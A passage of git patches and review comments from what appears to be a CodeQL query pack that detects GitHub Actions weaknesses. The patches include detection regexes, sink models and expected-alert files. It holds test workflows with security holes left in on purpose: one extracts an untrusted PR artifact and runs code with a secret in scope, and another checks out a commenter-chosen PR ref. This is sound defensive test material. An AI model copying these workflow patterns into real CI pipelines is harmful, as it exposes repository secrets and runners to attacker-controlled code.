.github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | | .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | | .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | 
@@ -310,6 +314,7 @@ edges | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | From ae6309daf6245078e328425a241ee34e7f9be250 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:02:58 +0200 Subject: [PATCH 0622/1267] Account for tar -C option to specify path --- .../security/ArtifactPoisoningQuery.qll | 14 +++---- .../CWE-829/.github/workflows/test25.yml | 42 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 ++ .../UntrustedCheckoutCritical.expected | 3 ++ 5 files changed, 59 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 48bca0e46f9..56f36316487 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -4,9 +4,9 @@ import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps -string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } +string unzipRegexp() { result = "(unzip|tar)\\s+.*" } -string unzipDirArgRegexp() { result = "-d\\s+([^ ]+).*" } +string unzipDirArgRegexp() { result = "(-d|-C)\\s+([^ ]+).*" } abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); 
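Review bot: `unzipDirArgRegexp()` now accepts `-d` or `-C` after either tool, but the two flags are tool-specific: `-C` is tar's change-directory option while for unzip it is an argument-less case-insensitivity switch, and `-d` is unzip's target directory while for tar it selects compare mode. Because the preceding `.*` is greedy, the last `-d`/`-C` on the line wins, so a constructed command like `unzip -d out -C a.zip` would yield `a.zip` as the extraction path. Pairing each flag with its tool would avoid this, and tar's long form `--directory` is not covered either. At minimum I would add `// -d: unzip target dir, -C: tar target dir; the pattern does not check which tool the flag follows` above the predicate. Separately, `unzipRegexp()` lost its leading `.*`, so wherever it is used alone with `regexpMatch` a prefixed invocation (for example one run through `sudo`) no longer matches, if `getACommand()` can return such strings.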
@@ -166,7 +166,7 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" @@ -197,13 +197,13 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { result = normalizePath(trimQuotes(this.getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or @@ -243,13 +243,13 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { result = normalizePath(trimQuotes(this.getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else result = "GITHUB_WORKSPACE/" } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml new file mode 100644 index 00000000000..c825cc73813 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml 
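Review bot: The capture index passed to `regexpCapture(unzipRegexp() + unzipDirArgRegexp(), …)` had to move from 2 to 3 in `ActionsGitHubScriptDownloadStep`, `GHRunArtifactDownloadStep` and `DirectArtifactDownloadStep` only because the flag alternation became a capturing group. Writing it as non-capturing, `string unzipDirArgRegexp() { result = "(?:-d|-C)\\s+([^ ]+).*" }`, would have left the path at group 2 and these five call sites untouched. It would also stop the next added flag from silently shifting the index again. Failing that, a comment next to the predicate naming which group holds the path would help. The enclosing predicates start and end outside these hunks.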
@@ -0,0 +1,42 @@ +on: + workflow_run: + workflows: [ "build" ] + types: [ completed ] + +defaults: + run: + shell: bash + +jobs: + publish-build-scans: + name: Build scan publish + if: github.repository == 'test/test' && github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion != 'cancelled' + runs-on: ubuntu-latest + steps: + # Checkout target branch which has trusted code + - name: Check out target branch + uses: actions/checkout@v4 + with: + persist-credentials: false + ref: ${{ github.ref }} + - name: Download build scan + id: downloadBuildScan + uses: actions/download-artifact@v4 + with: + name: build-scan + github-token: ${{ github.token }} + repository: ${{ github.repository }} + run-id: ${{ github.event.workflow_run.id }} + # Don't fail a build if the file doesn't exist + continue-on-error: true + - name: Extract previously uploaded build scan content + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + run: tar -xzf build-scan.tgz -C ~ + - name: Publish + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + # Don't fail a build if publishing fails + continue-on-error: true + run: | + ./gradlew buildScanPublishPrevious + env: + ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 53b14ee7b50..fd3c1fbc195 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
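Review bot: This fixture may not exercise the `-C` handling it was added for. The artifact is fetched with `actions/download-artifact@v4`, whereas the visible `regexpCapture` changes are in `ActionsGitHubScriptDownloadStep`, `GHRunArtifactDownloadStep` and `DirectArtifactDownloadStep`. The expected output reports `Uses Step: downloadBuildScan` as the source, which suggests the alert comes from the download step's own path rather than from parsing `tar -xzf build-scan.tgz -C ~`. A fixture that downloads through one of those three step kinds and extracts with `tar … -C <dir>` would pin the new regex, ideally alongside one where the later step reads only from outside `<dir>` and is expected not to alert. A leading comment stating the expected result, e.g. `# expect: artifact poisoning alert on the Publish step`, would also help.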
@@ -15,6 +15,7 @@ edges | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -47,6 +48,8 @@ nodes | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -65,3 +68,4 @@ subpaths | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 49cee7772c0..09aed9e34a1 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -15,6 +15,7 @@ edges | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -47,5 +48,7 @@ nodes | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 6b273518167..3b2e5eb9de8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -276,6 +276,9 @@ edges | .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | | .github/workflows/test24.yml:7:9:10:6 | Uses Step | .github/workflows/test24.yml:10:9:16:6 | Run Step | | .github/workflows/test24.yml:10:9:16:6 | Run Step | .github/workflows/test24.yml:16:9:20:57 | Run Step | +| .github/workflows/test25.yml:17:9:22:6 | Uses Step | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:32:9:35:6 | Run Step | +| .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From b6a26e76d4c3bece2bcee0d58c8b69cc0390be7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:03:11 +0200 Subject: [PATCH 0623/1267] New azure models --- ql/lib/ext/manual/azure_cli.model.yml | 7 +++++++ ql/lib/ext/manual/azure_powershell.model.yml | 1 + 2 files changed, 8 insertions(+) create mode 100644 ql/lib/ext/manual/azure_cli.model.yml diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/ql/lib/ext/manual/azure_cli.model.yml new file mode 100644 index 00000000000..dcf1de044aa --- /dev/null +++ b/ql/lib/ext/manual/azure_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"] + - ["azure/cli", "*", "input.azcliversion", "command-injection", "manual"] 
diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml index e050b61815e..a2d08f93928 100644 --- a/ql/lib/ext/manual/azure_powershell.model.yml +++ b/ql/lib/ext/manual/azure_powershell.model.yml @@ -3,4 +3,5 @@ extensions: pack: github/actions-all extensible: actionsSinkModel data: + - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"] - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] From dbcf113546430d68a479f0766124576f46e024a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:04:01 +0200 Subject: [PATCH 0624/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1af220ff8fb..a818ba5362a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.75 +version: 0.1.76 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e8098e4f215..fe6bdb0d77e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.75 +version: 0.1.76 groups: [actions, queries] suites: codeql-suites extractor: javascript From c9b1cd2c02ff6b6cebec5c8c34e296a10e768eb9 Mon Sep 17 00:00:00 2001 
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:16:43 -0400 Subject: [PATCH 0625/1267] add workflow to catch some ineligible wildcards and eligible latest version for immutable actions --- .../UseOfUnversionedImmutableAction.qll | 15 ++++++-- .../workflows/issue_comment_octokit2.yml | 38 +++++++++++++++++++ .../UnversionedImmutableAction.expected | 3 ++ 3 files changed, 53 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 3f65a2ffc72..2fd47e3f8e1 100644 --- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -6,11 +6,20 @@ class UnversionedImmutableAction extends UsesStep { UnversionedImmutableAction() { immutableActionsDataModel(immutable_action) and this.getCallee() = immutable_action and - isNotSemVer(this.getVersion()) + not isSemVer(this.getVersion()) } } bindingset[version] -predicate isNotSemVer(string version) { - not version.regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") +predicate isSemVer(string version) { + // https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string with optional v prefix + version.regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") + + // or N or N.x or N.N.x with optional v prefix + or version.regexpMatch("^v?[1-9]\\d*$") + or version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") + or version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") + + // or latest which will work + or version = "latest" } 
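Review bot: `isSemVer` holds for more than semantic versions: besides the semver.org pattern, the added alternatives accept `N`, `N.x`, `N.N.x` and the literal `latest`, none of which names one fixed release, so `UnversionedImmutableAction` stays silent on references that presumably can resolve to different code from one run to the next. If that is the intent, the predicate should carry a QLDoc comment that says so, e.g. `/** Holds if version is an exact semantic version, a major or minor range (N, N.x, N.N.x) or latest, with an optional v prefix. */`, with a sentence on why ranges and `latest` are considered acceptable for this query. The old pattern also accepted `[xX]`, whereas the new range patterns accept only lowercase `x` and reject a major version of `0`; a test case for each would show whether that narrowing is deliberate. The enclosing class starts above the hunk.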
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml
new file mode 100644
index 00000000000..84081fef5d0
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml
@@ -0,0 +1,38 @@
+name: Octokit (heuristics)
+
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ test1:
+ if: github.event.comment.body == '@metabase-bot run visual tests'
+ runs-on: ubuntu-22.04
+ steps:
+ - name: Fetch issue
+ uses: octokit/request-action@v2.x
+ id: fetch_issue
+ with:
+ route: GET ${{ github.event.issue.url }}
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ - name: Fetch PR minor and patch wildcard
+ uses: octokit/request-action@v2.x.x
+ id: fetch_pr
+ with:
+ route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }}
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ - name: Checkout PR minor patch wildcard
+ - uses: actions/checkout@v2.x.xx
+ with:
+ ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }}
+ token: ${{ secrets.GITHUB_TOKEN }}
+ - name: Checkout PR minor wildcard incomplete patch
+ uses: actions/checkout@v2.x.
+ - name: Run latest action
+ uses: some-action/some-repo@latest
+ with:
+ some-input: some-value
+ - name: run the latest checkout action
+ uses: actions/checkout@latest
\ No newline at end of file
diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected
index 5ae46862fb4..3aa7d6d654e 100644
--- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected
+++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected
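Review bot: The step `- name: Checkout PR minor patch wildcard` is followed by `- uses: actions/checkout@v2.x.xx` with its own list dash, so the fixture holds one step that has a name but neither `uses` nor `run`, and an unnamed checkout step after it. The expected file in this commit is consistent with that reading, since the reported `Uses Step` for this checkout starts at line 27 rather than 26. If the split is not deliberate, drop the dash so the line reads `uses: actions/checkout@v2.x.xx` and regenerate the expected locations. The file also ends without a trailing newline.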
@@ -4,6 +4,9 @@ | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | | .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow 
is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | From 1c6d346f5343b115ec70c40e0852c70be052c52b Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:24:12 -0400 Subject: [PATCH 0626/1267] change ql message --- .../CWE-829/UnversionedImmutableAction.ql | 2 +- .../UnversionedImmutableAction.expected | 44 +++++++++---------- 2 files changed, 23 insertions(+), 23 deletions(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql index 0c6443bc3e6..0bc571ad473 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -15,5 +15,5 @@ import codeql.actions.security.UseOfUnversionedImmutableAction from UnversionedImmutableAction step select step, - "The workflow is using an immutable action ($@) without versinoning so it doesn't work", step, + "The workflow is using an eligible immutable action ($@) without semantic versioning", step, step.getCallee() \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index 3aa7d6d654e..df23709b542 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected 
@@ -1,22 +1,22 @@ -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | -| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | -| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | -| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | 